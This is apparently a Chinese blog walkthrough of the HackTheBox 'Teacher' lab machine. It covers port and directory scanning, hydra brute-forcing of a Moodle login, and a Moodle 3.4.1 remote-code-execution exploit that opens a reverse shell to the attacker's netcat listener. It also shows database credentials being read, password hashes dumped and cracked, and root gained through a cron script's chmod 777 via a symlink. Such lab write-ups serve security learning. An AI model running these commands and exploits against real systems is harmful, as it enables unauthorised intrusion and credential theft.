2020-03-24 3.1k

HTB::Teacher Walkthrough

0x01 Info Card

0x02 Tools and Tips

nmap
nikto
dirb
dirsearch
hydra
hash-identifier
Moodle 3.4.1 - Remote Code Execute

0x03 Pentesting

Initial Enumeration

nmap扫描靶机TCP端口

λ nmap -sV -A -Pn -T4 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 13:08 ?D1ú±ê×?ê±??
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 56.13% done; ETC: 13:08 (0:00:04 remaining)
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 13:08 (0:00:00 remaining)
Nmap scan report for 10.10.10.153
Host is up (0.23s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/22%OT=80%CT=1%CU=39891%PV=Y%DS=2%DC=T%G=Y%TM=5E76F2E
OS:3%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8
OS:)SEQ(CI=I%II=I)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54D
OS:ST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W
OS:5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   230.00 ms 10.10.14.1
2   232.00 ms 10.10.10.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.73 seconds

用dirsearch扫描网站

[01:00:42] 301 -  310B  - /css  ->  http://10.10.10.153/css/                                     [01:00:54] 301 -  312B  - /fonts  ->  http://10.10.10.153/fonts/                                 [01:01:01] 301 -  313B  - /images  ->  http://10.10.10.153/images/                               [01:01:03] 200 -    8KB - /index.html                                                           [01:01:06] 301 -  317B  - /javascript  ->  http://10.10.10.153/javascript/                       [01:01:07] 301 -  309B  - /js  ->  http://10.10.10.153/js/
[01:01:15] 301 -  313B  - /manual  ->  http://10.10.10.153/manual/
[01:01:15] 200 -  626B  - /manual/index.html
[01:01:19] 301 -  313B  - /moodle  ->  http://10.10.10.153/moodle/

Getting User Access

去看一下images目录：

一个个点开看一下，发现5.png无法显示，应该不是一个图片，下载后用Notepad++打开

Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

让我们猜解密码的最后一位，但是现在不知道用户名和密码是用在哪登录的，再去看moodle目录

Moodle是一个开源课程管理系统（CMS），也被称为学习管理系统（LMS）或虚拟学习环境（VLE）。它已成为深受世界各地教育工作者喜爱的一种为学生建立网上动态网站的工具。

用hydra爆破密码之前先用Python生成一个密码字典：

1
2
3

with open('pwd.txt', 'w') as f:
    for i in range(0, 127):
        f.write('Th4C00lTheacha{}\n'.format(chr(i)))

再用hydra进行密码爆破，由于只有在我们提交正确的密码后才设置Cookie，因此我们会在Set-Cookie上将其匹配为正确的响应。

$ hydra -I -l giovanni -P pwd.txt 10.10.10.153 http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-22 04:23:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 128 login tries (l:1/p:128), ~8 tries per task
[DATA] attacking http-post-form://10.10.10.153:80/moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie
[80][http-post-form] host: 10.10.10.153   login: giovanni   password: Th4C00lTheacha#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-22 04:23:58

找到了密码login: giovanni&password: Th4C00lTheacha#。

同时用nikto扫描一下有用的信息：

$ nikto -host http://10.10.10.153/moodle                                                         - Nikto v2.1.6                                                                                   ---------------------------------------------------------------------------                     + Target IP:          10.10.10.153                                                               + Target Hostname:    10.10.10.153
+ Target Port:        80
+ Start Time:         2020-03-22 02:49:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Cookie MoodleSession created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'content-script-type' found, with contents: text/javascript
+ Uncommon header 'content-style-type' found, with contents: text/css
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /moodle/config.php: PHP Config file may contain database IDs and passwords.
+ Uncommon header 'x-accel-buffering' found, with contents: no
+ OSVDB-3092: /moodle/auth/: This might be interesting...
+ OSVDB-3268: /moodle/backup/: Directory indexing found.
+ OSVDB-3092: /moodle/backup/: This might be interesting...
+ OSVDB-3268: /moodle/install/: Directory indexing found.
+ OSVDB-3092: /moodle/install/: This might be interesting...
+ OSVDB-3092: /moodle/lib/: This might be interesting...
+ OSVDB-3092: /moodle/login/: This might be interesting...
+ OSVDB-3268: /moodle/pix/: Directory indexing found.
+ OSVDB-3092: /moodle/pix/: This might be interesting...
+ OSVDB-3092: /moodle/INSTALL.txt: Default file found.
+ OSVDB-3268: /moodle/repository/: Directory indexing found.
+ /moodle/repository/: CRX WebDAV upload
+ /moodle/composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /moodle/composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /moodle/package.json: Node.js package file found. It may contain sensitive information.
+ 7871 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time:           2020-03-22 03:27:50 (GMT-4) (2289 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

主要是有两个文件值得注意：

/moodle/config.php
/moodle/INSTALL.txt

config配置文件之后会用到，而INSTALL文件告诉了我们当前moodle的版本是3.2。

搜一下moodle相关的漏洞：

试一下Moodle 3.4.1 - Remote Code Execute的利用方式：

$ sudo php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass=Th4C00lTheacha# ip=10.10.16.89 port=4444 course=2

*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*

[!] Make sure you have a listener
[!] at 10.10.16.89:4444

[*] Logging in as user giovanni with password Th4C00lTheacha# 
[+] Successful Login
[>] Moodle Session q86b6t60vldlqjk0gp90u5mat0 
[>] Moodle Key N25C2hyBzu 
[*] Loading Course ID 2 
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page 
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question 
[+] Successfully Added Calculation Question
[*] Adding Evil Question 
[+] Successfully Created Evil Question
[*] Sending Exploit

[>] You should receive a reverse shell attempt from the target at 10.10.16.89 on port 4444 
[>] If connection was successful this program will wait here until you close the connection.
[>] You should be able to Ctrl+C and retain the connection through netcat.

本机监听4444端口

$ nc -lvvp 4444                                                                                 listening on [any] 4444 ...                                                                     10.10.10.153: inverse host lookup failed: Unknown host                                           connect to [10.10.16.89] from (UNKNOWN) [10.10.10.153] 42232                                    /bin/sh: 0: can't access tty; job control turned off                                             $ python -c 'import pty;pty.spawn("/bin/bash")'                                                 www-data@teacher:/var/www/html/moodle/question$ id                                               id                                                                                               uid=33(www-data) gid=33(www-data) groups=33(www-data)

查看config.php网站文件

www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8mb4_unicode_ci',
);

$CFG->wwwroot   = 'http://10.10.10.153/moodle';
$CFG->dataroot  = '/var/www/moodledata';
$CFG->admin     = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

这里列出了MySQL数据库的登录用户名和密码：root和Welkom1!

www-data@teacher:/var/www/moodledata$ mysql -u root -p                                           mysql -u root -p                                                                                 Enter password: Welkom1!                                                                         Welcome to the MariaDB monitor.  Commands end with ; or \g.                                    Your MariaDB connection id is 949                                                               Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1                                             Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.                             Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
......
MariaDB [moodle]> select username, password from mdl_user;
select username, password from mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)

查看那一串数字的加密方式

$ hash-identifier 7a860966115182402ed06375cf0a22af
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

7a860966115182402ed06375cf0a22afmd5解密

www-data@teacher:/var/www/moodledata$ su giovanni
su giovanni
Password: expelled

giovanni@teacher:/var/www/moodledata$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
giovanni@teacher:/var/www/moodledata$ ls /home/giovanni/  
ls /home/giovanni/
user.txt  work

Getting Root Access

giovanni@teacher:~/work$ ls -lR
ls -lR
.:
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp

./courses:
total 4
drwxr-xr-x 2 root root 4096 Jun 27  2018 algebra

./courses/algebra:
total 4
-rw-r--r-- 1 giovanni giovanni 109 Jun 27  2018 answersAlgebra

./tmp:
total 8
-rwxrwxrwx 1 root root  256 Mar 22 16:08 backup_courses.tar.gz
drwxrwxrwx 3 root root 4096 Jun 27  2018 courses

./tmp/courses:
total 4
drwxrwxrwx 2 root root 4096 Jun 27  2018 algebra

./tmp/courses/algebra:
total 4
-rwxrwxrwx 1 giovanni giovanni 109 Jun 27  2018 answersAlgebra
giovanni@teacher:~/work$ date
date
Sun Mar 22 16:08:17 CET 2020

我们可以发现/tmp/backup_courses.tar.gz的时间就是当前的时间，猜测这应该是一个定时任务。

定时任务的脚本位于/usr/bin/backup.sh：

#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

我门只需要看到这个脚本执行后~/tmp目录下的所有文件或文件夹的权限变成了777，那么现在就很容易了，在tmp目录下新建一个根目录的软连接即可。

giovanni@teacher:~/work/tmp$ ln -s / ca01h
ln -s / ca01h
giovanni@teacher:~/work/tmp$ ls -la /
ls -la /
total 84
drwxrwxrwx 22 root root  4096 Oct 28  2018 .
drwxrwxrwx 22 root root  4096 Oct 28  2018 ..
drwxrwxrwx  2 root root  4096 Oct 28  2018 bin
drwxrwxrwx  3 root root  4096 Oct 28  2018 boot
drwxrwxrwx 17 root root  3080 Mar 22 05:06 dev
drwxrwxrwx 84 root root  4096 Oct 28  2018 etc
drwxrwxrwx  3 root root  4096 Jun 27  2018 home
lrwxrwxrwx  1 root root    29 Oct 28  2018 initrd.img -> boot/initrd.img-4.9.0-8-amd64
lrwxrwxrwx  1 root root    29 Oct 28  2018 initrd.img.old -> boot/initrd.img-4.9.0-6-amd64
drwxrwxrwx 15 root root  4096 Jun 27  2018 lib
drwxrwxrwx  2 root root  4096 Jun 27  2018 lib64
drwxrwxrwx  2 root root 16384 Jun 27  2018 lost+found
drwxrwxrwx  3 root root  4096 Jun 27  2018 media
drwxrwxrwx  2 root root  4096 Jun 27  2018 mnt
drwxrwxrwx  2 root root  4096 Jun 27  2018 opt
drwxrwxrwx 93 root root     0 Mar 22 05:06 proc
drwxrwxrwx  3 root root  4096 Nov  4  2018 root
drwxrwxrwx 18 root root   500 Mar 22 05:06 run
drwxrwxrwx  2 root root  4096 Oct 28  2018 sbin
drwxrwxrwx  2 root root  4096 Jun 27  2018 srv
drwxrwxrwx 13 root root     0 Mar 22 16:19 sys
drwxrwxrwx  2 root root  4096 Mar 22 06:26 tmp
drwxrwxrwx 10 root root  4096 Jun 27  2018 usr
drwxrwxrwx 12 root root  4096 Jun 27  2018 var
lrwxrwxrwx  1 root root    26 Oct 28  2018 vmlinuz -> boot/vmlinuz-4.9.0-8-amd64
lrwxrwxrwx  1 root root    26 Oct 28  2018 vmlinuz.old -> boot/vmlinuz-4.9.0-6-amd64
giovanni@teacher:~/work/tmp$ ls -la /root/root.txt
ls -la /root/root.txt
-rwxrwxrwx 1 root root 33 Jun 27  2018 /root/root.txt

0x04 CVE Analysis

https://blog.ripstech.com/2018/moodle-remote-code-execution/

0x05 Conclusion

渗透过程：

0x06 Reference

https://ech1.netlify.com/htb/easy/26

https://blog.ripstech.com/2018/moodle-remote-code-execution/

靶机->HTB
#靶机

文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

算法

Leetcode

随笔

经验

技术